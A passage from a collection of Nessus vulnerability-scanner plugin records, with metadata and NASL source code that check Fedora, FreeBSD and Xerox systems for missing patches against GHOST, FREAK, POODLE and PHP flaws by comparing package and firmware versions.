(Yasuo)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script)\n (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start\n sessions) (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares\n wrong required_num_args). (Julien)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set\n correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. 
variables from\n previous requests if PHP works as FastCGI). (Anatol)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams\n filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-February/150370.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7e0c26f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.6-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-11T14:49:56", "description": "The PHP Project reports :\n\nUse after free vulnerability in unserialize() with DateTimeZone.\n\nMitigation for CVE-2015-0235 -- GHOST: glibc gethostbyname buffer overflow.", "cvss3": {}, "published": "2015-02-27T00:00:00", "type": "nessus", "title": "FreeBSD : php5 -- multiple vulnerabilities (f7a9e415-bdca-11e4-970c-000c292ee6b8) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php56", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F7A9E415BDCA11E4970C000C292EE6B8.NASL", "href": "https://www.tenable.com/plugins/nessus/81559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
```nasl
# Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(81559);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2015-0235", "CVE-2015-0273");

  script_name(english:"FreeBSD : php5 -- multiple vulnerabilities (f7a9e415-bdca-11e4-970c-000c292ee6b8) (GHOST)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote FreeBSD host is missing one or more security-related
updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The PHP Project reports :

Use after free vulnerability in unserialize() with DateTimeZone.

Mitigation for CVE-2015-0235 -- GHOST: glibc gethostbyname buffer
overflow."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://php.net/ChangeLog-5.php#5.4.38"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://php.net/ChangeLog-5.php#5.5.22"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://php.net/ChangeLog-5.php#5.6.6"
  );
  # https://vuxml.freebsd.org/freebsd/f7a9e415-bdca-11e4-970c-000c292ee6b8.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?6d0ca766"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:php5");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:php55");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:php56");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/02/26");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/02/27");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"php5<5.4.38")) flag++;
if (pkg_test(save_report:TRUE, pkg:"php55<5.5.22")) flag++;
if (pkg_test(save_report:TRUE, pkg:"php56<5.6.6")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```

**CVSS:** 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

## Xerox WorkCentre 77XX Multiple Vulnerabilities (XRX15R) (FREAK) (GHOST)

**Plugin:** XEROX_XRX15R.NASL, [https://www.tenable.com/plugins/nessus/87327](https://www.tenable.com/plugins/nessus/87327)
**Type:** nessus (scanner)
**Published:** 2015-12-11; **Modified:** 2019-11-20; **Last seen:** 2023-01-11T15:05:06
**CVEs:** CVE-2015-0204, CVE-2015-0235
**CPE:** cpe:/h:xerox:workcentre
**CVSS v2:** 10.0 (HIGH), AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability score 10.0, impact score 10.0; access vector NETWORK, access complexity LOW, authentication NONE; confidentiality/integrity/availability impact COMPLETE; user interaction required: false; obtainAllPrivilege/obtainUserPrivilege/obtainOtherPrivilege: false
**CVSS v3:** none recorded

**Description:** According to its model number and software version, the remote Xerox WorkCentre 77XX device is affected by multiple vulnerabilities :

- A security feature bypass vulnerability, known as FREAK (Factoring attack on RSA-EXPORT Keys), exists due to the support of weak EXPORT_RSA cipher suites with keys less than or equal to 512 bits. A man-in-the-middle attacker may be able to downgrade the SSL/TLS connection to use EXPORT_RSA cipher suites which can be factored in a short amount of time, allowing the attacker to intercept and decrypt the traffic. (CVE-2015-0204)
- A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. This vulnerability is known as GHOST. (CVE-2015-0235)

**Plugin source:**

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(87327);
  script_version("1.4");
  script_cvs_date("Date: 2019/11/20");

  script_cve_id("CVE-2015-0204", "CVE-2015-0235");
  script_bugtraq_id(71936, 72325);
  script_xref(name:"CERT", value:"243585");
  script_xref(name:"CERT", value:"967332");

  script_name(english:"Xerox WorkCentre 77XX Multiple Vulnerabilities (XRX15R) (FREAK) (GHOST)");
  script_summary(english:"Checks system software version of Xerox WorkCentre devices.");

  script_set_attribute(attribute:"synopsis", value:
"The remote multi-function device is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its model number and software version, the remote Xerox
WorkCentre 77XX device is affected by multiple vulnerabilities :

  - A security feature bypass vulnerability, known as FREAK
    (Factoring attack on RSA-EXPORT Keys), exists due to the
    support of weak EXPORT_RSA cipher suites with keys less
    than or equal to 512 bits. A man-in-the-middle attacker
    may be able to downgrade the SSL/TLS connection to use
    EXPORT_RSA cipher suites which can be factored in a
    short amount of time, allowing the attacker to intercept
    and decrypt the traffic. (CVE-2015-0204)

  - A heap-based buffer overflow condition exists in the GNU
    C Library (glibc) due to improper validation of
    user-supplied input to the glibc functions
    __nss_hostname_digits_dots(), gethostbyname(), and
    gethostbyname2(). This allows a remote attacker to cause
    a buffer overflow, resulting in a denial of service
    condition or the execution of arbitrary code. This
    vulnerability is known as GHOST. (CVE-2015-0235)");
  # https://www.xerox.com/download/security/security-bulletin/1cd29-52276b40e059d/cert_Security_Mini-_Bulletin_XRX15R_for_WC77xx_v1-0.pdf
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?94c70bf4");
  script_set_attribute(attribute:"see_also", value:"https://www.smacktls.com/#freak");
  # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c7a6ddbd");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate cumulative update as described in the Xerox
security bulletin in the referenced URL.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-0235");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/01/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/10/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:xerox:workcentre");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("xerox_workcentre_detect.nasl");
  script_require_keys("www/xerox_workcentre", "www/xerox_workcentre/model", "www/xerox_workcentre/ssw");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

# Get model and system software version
model = get_kb_item_or_exit("www/xerox_workcentre/model");
ver = get_kb_item_or_exit("www/xerox_workcentre/ssw");

# Only the 77XX models are covered by this bulletin
if (model =~ "^77[0-9][0-9]$")
  fix = "061.090.225.25000";
else
  audit(AUDIT_HOST_NOT, "an affected Xerox WorkCentre model");

if (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)
  audit(AUDIT_INST_VER_NOT_VULN, "Xerox WorkCentre " + model + " System SW", ver);

if (report_verbosity > 0)
{
  report =
    '\n Model : Xerox WorkCentre ' + model +
    '\n Installed system software version : ' + ver +
    '\n Fixed system software version : ' + fix + '\n';
  security_hole(port:0, extra:report);
}
else security_hole(0);
```

**CVSS:** 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

## Fedora 20 : php-5.5.22-1.fc20 (2015-2328)

**Plugin:** FEDORA_2015-2328.NASL, [https://www.tenable.com/plugins/nessus/81612](https://www.tenable.com/plugins/nessus/81612)
**Type:** nessus (scanner)
**Published:** 2015-03-05; **Modified:** 2021-01-11; **Last seen:** 2023-01-11T14:52:01
**CVEs:** CVE-2015-0235, CVE-2015-0273
**CPE:** p-cpe:/a:fedoraproject:fedora:php, cpe:/o:fedoraproject:fedora:20
**CVSS v2:** none recorded; **CVSS v3:** none recorded

**Description:** 19 Feb 2015, PHP 5.5.22

Core :

- Fixed bug #67068 (getClosure returns somethings that's not a closure). (Danack at basereality dot com)
- Fixed bug #68925 (Mitigation for CVE-2015-0235 ' GHOST: glibc gethostbyname buffer overflow). (Stas)
- Fixed bug #68942 (Use after free vulnerability in unserialize() with DateTimeZone). (CVE-2015-0273) (Stas)
- Added NULL byte protection to exec, system and passthru. (Yasuo)
- Removed support for multi-line headers, as the are deprecated by RFC 7230. (Stas)

Date :

- Fixed bug #45081 (strtotime incorrectly interprets SGT time zone). (Derick)

Dba :

- Fixed bug #68711 (useless comparisons). (bugreports at internot dot info)

Enchant :

- Fixed bug #6855 (heap buffer overflow in enchant_broker_request_dict()). (Antony)

Fileinfo :

- Fixed bug #68827 (Double free with disabled ZMM). (Joshua Rogers)

FPM :

- Fixed bug #66479 (Wrong response to FCGI_GET_VALUES). (Frank Stolle)
- Fixed bug #68571 (core dump when webserver close the socket). (redfoxli069 at gmail dot com, Laruence)

Libxml :

- Fixed bug #64938 (libxml_disable_entity_loader setting is shared between threads). (Martin Jansen)

OpenSSL :

- Fixed bug #55618 (use case-insensitive cert name matching). (Daniel Lowrey)

PDO_mysql :

- Fixed bug #68750 (PDOMysql with mysqlnd does not allow the usage of named pipes). (steffenb198 at aol.com)

Phar :

- Fixed bug #68901 (use after free). (bugreports at internot dot info)

Pgsql :

- Fixed Bug #65199 'pg_copy_from() modifies input array variable). (Yasuo)

Sqlite3 :

- Fixed bug #68260 (SQLite3Result::fetchArray declares wrong required_num_args). (Julien)

Mysqli :

- Fixed bug #68114 (linker error on some OS X machines with fixed width decimal support) (Keyur Govande)
- Fixed bug #68657 (Reading 4 byte floats with Mysqli and libmysqlclient has rounding errors) (Keyur Govande)

Session :

- Fixed bug #68941 (mod_files.sh is a bash-script) (bugzilla at ii.nl, Yasuo)
- Fixed Bug #66623 (no EINTR check on flock) (Yasuo)
- Fixed bug #68063 (Empty session IDs do still start sessions) (Yasuo)

Standard :

- Fixed bug #65272 (flock() out parameter not set correctly in windows). (Daniel Lowrey)
- Fixed bug #69033 (Request may get env. variables from previous requests if PHP works as FastCGI)

Streams :

- Fixed bug which caused call after final close on streams filter. (Bob)

Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

**Plugin source:**

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2015-2328.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(81612);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  script_bugtraq_id(64225, 67118, 72325, 72701);
  script_xref(name:"FEDORA", value:"2015-2328");

  script_name(english:"Fedora 20 : php-5.5.22-1.fc20 (2015-2328)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"19 Feb 2015, PHP 5.5.22

Core :

  - Fixed bug #67068 (getClosure returns somethings that's
    not a closure). (Danack at basereality dot com)

  - Fixed bug #68925 (Mitigation for CVE-2015-0235 '
    GHOST: glibc gethostbyname buffer overflow). (Stas)

  - Fixed bug #68942 (Use after free vulnerability in
    unserialize() with DateTimeZone). (CVE-2015-0273)
    (Stas)

  - Added NULL byte protection to exec, system and
    passthru. (Yasuo)

  - Removed support for multi-line headers, as the are
    deprecated by RFC 7230. (Stas)

Date :

  - Fixed bug #45081 (strtotime incorrectly interprets SGT
    time zone). (Derick)

Dba :

  - Fixed bug #68711 (useless comparisons). (bugreports at
    internot dot info)

Enchant :

  - Fixed bug #6855 (heap buffer overflow in
    enchant_broker_request_dict()). (Antony)

Fileinfo :

  - Fixed bug #68827 (Double free with disabled ZMM).
    (Joshua Rogers)

FPM :

  - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).
    (Frank Stolle)

  - Fixed bug #68571 (core dump when webserver close the
    socket). (redfoxli069 at gmail dot com, Laruence)

Libxml :

  - Fixed bug #64938 (libxml_disable_entity_loader setting
    is shared between threads). (Martin Jansen)

OpenSSL :

  - Fixed bug #55618 (use case-insensitive cert name
    matching). (Daniel Lowrey)

PDO_mysql :

  - Fixed bug #68750 (PDOMysql with mysqlnd does not allow
    the usage of named pipes). (steffenb198 at aol.com)

Phar :

  - Fixed bug #68901 (use after free). (bugreports at
    internot dot info)

Pgsql :

  - Fixed Bug #65199 'pg_copy_from() modifies input array
    variable). (Yasuo)

Sqlite3 :

  - Fixed bug #68260 (SQLite3Result::fetchArray declares
    wrong required_num_args). (Julien)

Mysqli :

  - Fixed bug #68114 (linker error on some OS X machines
    with fixed width decimal support) (Keyur Govande)

  - Fixed bug #68657 (Reading 4 byte floats with Mysqli
    and libmysqlclient has rounding errors) (Keyur
    Govande)

Session :

  - Fixed bug #68941 (mod_files.sh is a bash-script)
    (bugzilla at ii.nl, Yasuo)

  - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)

  - Fixed bug #68063 (Empty session IDs do still start
    sessions) (Yasuo)

Standard :

  - Fixed bug #65272 (flock() out parameter not set
    correctly in windows). (Daniel Lowrey)

  - Fixed bug #69033 (Request may get env. variables from
    previous requests if PHP works as FastCGI)

Streams :

  - Fixed bug which caused call after final close on streams
    filter. (Bob)

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/150624.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?3c7c73c8"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected php package.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:php");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:20");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/02/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/05");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^20([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 20.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC20", reference:"php-5.5.22-1.fc20")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "php");
}
```

**CVSS:** 0.0 (NONE)

## Xerox ColorQube 92XX Multiple OpenSSL Vulnerabilities (XRX15AD) (FREAK) (GHOST) (POODLE)

**Plugin:** XEROX_XRX15AD_COLORQUBE.NASL, [https://www.tenable.com/plugins/nessus/87322](https://www.tenable.com/plugins/nessus/87322)
**Type:** nessus (scanner)
**Published:** 2015-12-11; **Modified:** 2019-11-20; **Last seen:** 2023-01-11T15:05:25
**CVEs:** CVE-2014-3566, CVE-2015-0204, CVE-2015-0235
**CPE:** cpe:/h:xerox:colorqube
**CVSS v3.1:** 3.4 (LOW), CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N; exploitability score 1.6, impact score 1.4; attack vector NETWORK, attack complexity HIGH, privileges required NONE, user interaction REQUIRED, scope CHANGED; confidentiality impact LOW, integrity impact NONE, availability impact NONE
**CVSS v2:** 10.0 (HIGH), AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability score 10.0, impact score 10.0; access vector NETWORK, access complexity LOW, authentication NONE; confidentiality/integrity/availability impact COMPLETE; user interaction required: false; obtainAllPrivilege/obtainUserPrivilege/obtainOtherPrivilege: false

**Description:** According to its model number and software version, the remote Xerox ColorQube device is affected by multiple OpenSSL vulnerabilities :

- A man-in-the-middle (MitM) information disclosure vulnerability, known as POODLE, exists due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566)
- A security feature bypass vulnerability, known as FREAK (Factoring attack on RSA-EXPORT Keys), exists due to the support of weak EXPORT_RSA cipher suites with keys less than or equal to 512 bits. A man-in-the-middle attacker may be able to downgrade the SSL/TLS connection to use EXPORT_RSA cipher suites which can be factored in a short amount of time, allowing the attacker to intercept and decrypt the traffic. (CVE-2015-0204)
- A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. This vulnerability is known as GHOST. (CVE-2015-0235)

**Plugin source:**

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(87322);
  script_version("1.6");
  script_cvs_date("Date: 2019/11/20");

  script_cve_id("CVE-2014-3566", "CVE-2015-0204", "CVE-2015-0235");
  script_bugtraq_id(70574, 71936, 72325);
  script_xref(name:"CERT", value:"243585");
  script_xref(name:"CERT", value:"577193");
  script_xref(name:"CERT", value:"967332");

  script_name(english:"Xerox ColorQube 92XX Multiple OpenSSL Vulnerabilities (XRX15AD) (FREAK) (GHOST) (POODLE)");
  script_summary(english:"Checks system software version of Xerox ColorQube devices.");

  script_set_attribute(attribute:"synopsis", value:
"The remote multi-function device is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its model number and software version, the remote Xerox
ColorQube device is affected by multiple OpenSSL vulnerabilities :

  - A man-in-the-middle (MitM) information disclosure
    vulnerability, known as POODLE, exists due to the way
    SSL 3.0 handles padding bytes when decrypting messages
    encrypted using block ciphers in cipher block chaining
    (CBC) mode. A MitM attacker can decrypt a selected byte
    of a cipher text in as few as 256 tries if they are able
    to force a victim application to repeatedly send the
    same data over newly created SSL 3.0 connections.
    (CVE-2014-3566)

  - A security feature bypass vulnerability, known as FREAK
    (Factoring attack on RSA-EXPORT Keys), exists due to the
    support of weak EXPORT_RSA cipher suites with keys less
    than or equal to 512 bits. A man-in-the-middle attacker
    may be able to downgrade the SSL/TLS connection to use
    EXPORT_RSA cipher suites which can be factored in a
    short amount of time, allowing the attacker to intercept
    and decrypt the traffic. (CVE-2015-0204)

  - A heap-based buffer overflow condition exists in the GNU
    C Library (glibc) due to improper validation of
    user-supplied input to the glibc functions
    __nss_hostname_digits_dots(), gethostbyname(), and
    gethostbyname2(). This allows a remote attacker to cause
    a buffer overflow, resulting in a denial of service
    condition or the execution of arbitrary code. This
    vulnerability is known as GHOST. (CVE-2015-0235)");
  # https://www.xerox.com/download/security/security-bulletin/27a16-51ca83a45a218/cert_Security_Mini-_Bulletin_XRX15AD_for_CQ92xx_v1-0a.pdf
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7240b740");
  script_set_attribute(attribute:"see_also", value:"https://www.imperialviolet.org/2014/10/14/poodle.html");
